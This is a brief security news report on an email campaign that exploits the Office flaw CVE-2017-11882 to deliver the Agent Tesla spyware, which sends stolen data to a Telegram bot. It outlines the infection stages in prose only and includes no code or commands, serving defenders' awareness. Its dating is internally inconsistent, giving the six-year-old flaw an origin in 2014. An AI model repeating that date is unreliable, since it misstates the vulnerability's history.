Cybercriminals are leveraging a six-year-old vulnerability in Microsoft Office to distribute spyware via a complex email campaign. The attackers use malicious Excel attachments exploiting the remote code execution (RCE) flaw CVE-2017-11882, dating back to 2014, to deliver the spyware. This flaw can potentially allow for system takeover. The ultimate objective of the attack is to install Agent Tesla, a remote access Trojan (RAT) and advanced keylogger first identified in 2014, and steal credentials and other data from compromised systems through a Telegram bot controlled by the attackers.
Despite the fact that the vulnerability has already been patched, older Microsoft Office versions that are still in use could be susceptible to the attack. Although Agent Tesla is nearly a decade old, it remains a popular tool among cybercriminals due to its features like clipboard logging, screen keylogging, screen capturing, and extracting stored passwords from different web browsers.
The attack method is unique as it combines an old vulnerability with new complexity and evasion tactics, demonstrating the adaptability of the attackers' infection methods. 'Making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape,' said Kaivalya Khursale, a senior security researcher at Zscaler.
The initial infection vector of the campaign seems ordinary, with attackers using socially engineered emails with business-oriented lures. However, once a user engages with the malicious email, the attack method becomes unconventional. Opening the malicious Excel attachment with a vulnerable version of the app initiates communication with a malicious source that pushes additional files.
The attack involves multiple stages, including the download of a malicious JPG file, execution of a PowerShell executable, and loading of malicious procedures from a decoded DLL. The malware eventually sends the exfiltrated data to a Telegram bot controlled by the attackers. Zscaler included a comprehensive list of indicators of compromise (IoCs) in their blog post to help identify if a system has been compromised.